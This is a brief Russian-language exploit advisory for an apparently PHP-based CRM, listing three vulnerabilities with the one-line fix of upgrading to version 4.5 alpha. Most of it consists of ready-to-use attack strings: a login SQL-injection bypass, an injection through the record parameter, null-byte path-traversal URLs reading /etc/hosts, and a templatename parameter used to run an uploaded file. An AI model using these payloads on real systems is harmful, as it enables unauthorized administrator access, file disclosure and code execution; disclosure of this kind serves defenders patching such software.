Эксплоит:
1) SQL-injection
На этот раз инъекция работает и при magic_quote on. Уязвимости подвержена форма
аутентификации:
«admin' or '1'='1»
С помощью данного запроса возможен вход под администратором в систему управления.
Также, данному типу уязвимости подвержен параметр record:
index.php?action=EditView&module=Contacts&record=15+or+1=1&return_module=Contacts&return_action=index
2) Просмотр произвольных файлов
index.php?module=../../../../../../../etc/hosts%00&action=index&record=
index.php?module=Leads&action=../../../../../../etc/hosts%00&record=
3) Выполнение произвольного кода
Уязвимым оказался параметр templatename
index.php?module=Users&action=TemplateMerge&templatename=/path/to/malicious/uploaded/file
Решение:
Обновить до версии 4.5 alpha
P.S. Которая скоро должна выйти =)